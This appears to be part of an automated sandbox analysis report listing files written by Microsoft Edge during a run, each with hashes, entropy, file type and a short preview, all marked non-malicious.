                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:nrC0Xl/lYV/lxEstllQPRon:rNYWs+in
                                                                                                                                                                                                                                                                                                        MD5:4A0C8B394D56A29162764E3810C19E04
                                                                                                                                                                                                                                                                                                        SHA1:EDACC5FFCEC723A009382C991526EB51BB5AE248
                                                                                                                                                                                                                                                                                                        SHA-256:37B8A982A761350EBB5754C77802F0D3F3FED07839EDFB3890675F035C00C9BE
                                                                                                                                                                                                                                                                                                        SHA-512:0DEF5668A87179C0ACC22314FD22BBE02DB4BF897AB0B373A5F20BA217B2042C47D0469E42116BB3CE9A08B0A9C8ECE369F75577C35D4A86DF982C85EB542907
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:@......oy retne.........................X....,.................4..../.
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):7739
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.3604397884011825
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:Dhmiq5DClQLEs9Xp+smApKi6DjLl9iSr/TU6dqE32:Dhmiq5Dd9Xp+smTZLl9iSrLd8E32
                                                                                                                                                                                                                                                                                                        MD5:52168C8B93D11BAD3224497BA4C2D2E9
                                                                                                                                                                                                                                                                                                        SHA1:56D6B4F52BDB7223550B9AC79991FEB7B4613664
                                                                                                                                                                                                                                                                                                        SHA-256:E2C00118A6879AEA7D475BD8D347C4A223FFD73C5D8925407DAE7A60C700E2A4
                                                                                                                                                                                                                                                                                                        SHA-512:04D04617F9F7B1D0793C0E1EF19947EFD2EAF042DA4E0F76FC2DF0995C6C4B76EE16F74A5AC397E9ECD113C24B354BDCC7481B22AFA728CEEC410B808FDFAB4B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f...............R...b................next-map-id.1.Cnamespace-f7d63829_6d7f_4ea3_9f72_e393d960e41b-https://ntp.msn.com/.0_...................map-0-shd_sweeper.9{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.r.g.-.1.s.w.-.c.c.-.c.a.l.f.e.e.d.i.,.p.r.g.-.e.s.h.b.t.n.t.r.t.f.a.c.,.p.r.g.-.1.s.w.-.c.n.h.o.r.o.-.c.,.p.r.g.-.m.s.n.-.g.l.s.b.i.d.m.,.c.p.r.g.-.c.-.p.o.l.i.s.h.-.s.t.y.l.e.s.,.1.s.-.p.n.p.s.n.i.c.e.r.t.,.p.r.g.-.1.s.w.-.s.a.b.g.t.a.s.k.t.h.r.o.t.,.p.r.g.-.1.s.w.-.s.a.c.f.x.2.t.5.,.p.r.g.-.1.s.w.-.s.a.g.e.i.m.a.n.n.i.2.c.,.p.r.g.-.1.s.w.-.s.a.l.3.r.m.f.e.a.t.s.t.,.p.r.g.-.1.s.w.-.n.o.a.b.r.t.-.r.,.p.r.g.-.1.s.w.-.t.m.u.i.d.s.y.n.c.r.f.w.o.e.r.r.,.p.r.g.-.1.s.w.-.r.e.f.r.e.s.h.p.,.p.r.g.-.1.s.w.-.t.m.u.i.d.1.s.s.y.n.c.,.
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):325
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.097177695266015
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:NeE24q2PN723oH+TcwtrQMxIFUt8Ee7gZmw+Et3DkwON723oH+TcwtrQMFLJ:8EVvVaYebCFUt8P0/+kz5OaYebtJ
                                                                                                                                                                                                                                                                                                        MD5:A6E49EFB4D1E343FBF1C40403B3F1F9B
                                                                                                                                                                                                                                                                                                        SHA1:6EAE58248BD5B1EA0DAFAD0C05EA2CF23C006901
                                                                                                                                                                                                                                                                                                        SHA-256:45BB30D91B852D11DC36D9482D07D294DE2164307311300606CB873EE7543461
                                                                                                                                                                                                                                                                                                        SHA-512:DE2A7F9C16093F3BF0CF132DF0035762802ABDBB53D0D7424B6A9C8CD8FCD8F28FC99D097CB337E44384A573B248E53BCB1C6E8B0251BB5664B4BCB953B1A244
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:20.413 b90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/24-13:28:20.414 b90 Recovering log #3.2024/12/24-13:28:20.421 b90 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1443
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.8181031622112718
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:3bHlea/5ksPXcikpsAF4unxctLp3X2amEtG1Chq9CRG3i69QKkOAM4b:3LPAzFKLp2FEkChtRLHOp
                                                                                                                                                                                                                                                                                                        MD5:609E1DE43799294DD336752D566FA785
                                                                                                                                                                                                                                                                                                        SHA1:BC7EDA781072C6C7227D88B279581C8903670071
                                                                                                                                                                                                                                                                                                        SHA-256:554EC628722CB7A81A606C0BEBA0C0304969B3767113FAD4F887157EA6494BB8
                                                                                                                                                                                                                                                                                                        SHA-512:893471ECFA1CB8790D49E1913CA44E4A96149FAA144DC6370241DFC75857F517F6C52D89727ED2689D2A17B6BC24929765548AE9AF753578D499F715EDBFC685
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:SNSS........z.y............z.y......".z.y............z.y........z.y........z.y........z.y....!...z.y................................z.y.z.y1..,....z.y$...f7d63829_6d7f_4ea3_9f72_e393d960e41b....z.y........z.y....0z..........z.y....z.y........................z.y....................5..0....z.y&...{46F3A197-DB49-410A-81B3-94975C835573}......z.y........z.y...........................z.y............z.y........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x.......d54G.*..e54G.*.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                                        MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                                        SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                                        SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                                        SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):356
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.143622894495237
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:NXeyq2PN723oH+Tcwt7Uh2ghZIFUt8EXI1Zmw+EXfRkwON723oH+Tcwt7Uh2gnLJ:ZeyvVaYebIhHh2FUt8KG/+KfR5OaYebs
                                                                                                                                                                                                                                                                                                        MD5:0EFA28629E85CD812BBABB7E5DAC7800
                                                                                                                                                                                                                                                                                                        SHA1:1E79E2C070A81B01F03357D29E2D0736C882DC35
                                                                                                                                                                                                                                                                                                        SHA-256:0F8FAF09C40DC403753353F019B29B8AD27F06A77E47D78E9B96E76F61F58755
                                                                                                                                                                                                                                                                                                        SHA-512:93933091B379D47D2564792E95C4CB0B2890DB35240E24A61926F54D37BB57CD833FA5B02962AA0C7D98032C721855A4FBB9979F7F0DD1CCDE5386AE5BB68C4B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:19.683 1be4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/24-13:28:19.683 1be4 Recovering log #3.2024/12/24-13:28:19.684 1be4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):270336
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                        MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                        SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                        SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                        SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):435
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.21313550656892
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:NIF4q2PN723oH+TcwtzjqEKj3K/2jMGIFUt8EsIJZmw+EoqFkwON723oH+Tcwtzg:VvVaYebvqBQFUt8W/+KF5OaYebvqBvJ
                                                                                                                                                                                                                                                                                                        MD5:AC37109AF01DFFD14CB7523ADB4BA1E9
                                                                                                                                                                                                                                                                                                        SHA1:EB64BB245C490860B0FD5E5FE8987152566B0D4C
                                                                                                                                                                                                                                                                                                        SHA-256:568BB091B9F0CCAA542558F99CD3E5DF62BD755324290E103ADB40548E0D7A2D
                                                                                                                                                                                                                                                                                                        SHA-512:8731FFD3E1ABF50B54BA830D98E6184A662867E4C1E0982559EB2A4CF82B253397C2512E93EE7C07C3BF4B0C11A6C9E1BB60B69724D801805D234D2996BE47E1
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:20.833 b90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/24-13:28:20.841 b90 Recovering log #3.2024/12/24-13:28:20.845 b90 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:[]
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):111
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
                                                                                                                                                                                                                                                                                                        MD5:807419CA9A4734FEAF8D8563A003B048
                                                                                                                                                                                                                                                                                                        SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                                                                                                                                                                                                                                                                        SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                                                                                                                                                                                                                                                                        SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):40
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                        MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                        SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                        SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                        SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):111
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
                                                                                                                                                                                                                                                                                                        MD5:807419CA9A4734FEAF8D8563A003B048
                                                                                                                                                                                                                                                                                                        SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                                                                                                                                                                                                                                                                        SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                                                                                                                                                                                                                                                                        SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:[]
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:[]
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):40
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                        MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                        SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                        SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                        SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):36864
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                                        MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                                                        SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                                                        SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                                                        SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):80
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                                        MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                                        SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                                        SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                                        SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:*...#................version.1..namespace-..&f.................&f...............
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):423
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.234364745651527
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:j9MIvVaYebvqBZFUt83WJ/+4P5OaYebvqBaJ:Z5VaYebvyg83WlBOaYebvL
                                                                                                                                                                                                                                                                                                        MD5:0A25DB5379181F44CA6694E5C18E703B
                                                                                                                                                                                                                                                                                                        SHA1:10EFFC832C834CC7EA3E55A74D27A4DB8D9AEF9C
                                                                                                                                                                                                                                                                                                        SHA-256:129E99E690845E38812E143372BED5FC9C3C41E957379C8084DE01839F079CFF
                                                                                                                                                                                                                                                                                                        SHA-512:DA17C5F9F235F836651528B67FC8C2E190AA1A3C333F38A29B218D6642B2E1A2021B20755B41C8FF915EBD3FEE47AF5AADD1724A83CD5DCE3AC3ABEA2A8AE31B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:37.277 b90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/24-13:28:37.278 b90 Recovering log #3.2024/12/24-13:28:37.281 b90 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):332
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.203070070574287
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:NXh7cHlL+q2PN723oH+TcwtpIFUt8EXh7cHz1Zmw+EXhWoFLVkwON723oH+Tcwt7:Zh7kIvVaYebmFUt8Kh7kz1/+KhWs5OaT
                                                                                                                                                                                                                                                                                                        MD5:720CB3B292028CEFD8E12CEAE57E7664
                                                                                                                                                                                                                                                                                                        SHA1:F6DAA0ABA6089D81D8CFC4E1B1893CB68C936BFC
                                                                                                                                                                                                                                                                                                        SHA-256:07C7BA6479DF3680A0872526B3E453CAF84FF0F3BB0F513EB35F3B08C434BF3B
                                                                                                                                                                                                                                                                                                        SHA-512:36566140B50B5203DCCC07009DB3FECFB86A968D2FD2E20B7B15606D26ED4CEDFD217030DC19FC245EB2EAB7F94FA05095C9B69E9989B3B7E2403A82AFA9D352
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:19.772 1a98 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/24-13:28:19.772 1a98 Recovering log #3.2024/12/24-13:28:19.773 1a98 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x37, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):196608
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.2680272407768105
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:384:L/2qOB1nxCkMqSA1LyKOMq+8iP5GDHP/0jMVumE:Kq+n0Jq91LyKOMq+8iP5GLP/0R
                                                                                                                                                                                                                                                                                                        MD5:A24B9AECDB22ACB1A68C21B6F2ABD338
                                                                                                                                                                                                                                                                                                        SHA1:AC6A14792AA01781E21C1DF1776A72B86E99120B
                                                                                                                                                                                                                                                                                                        SHA-256:E6798C6EFE4FB00679922741727CB363956B5E44288E8006788E513981099D1A
                                                                                                                                                                                                                                                                                                        SHA-512:E89615B66B7999600EC6FA5AF31BDBB5D3985A948ABBC44CF3CC8B63B4662C3D4FCFBA3A17A50DDDE4E02B4226ED75D83FD57A940469F8C5A6A37289797BF1AD
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
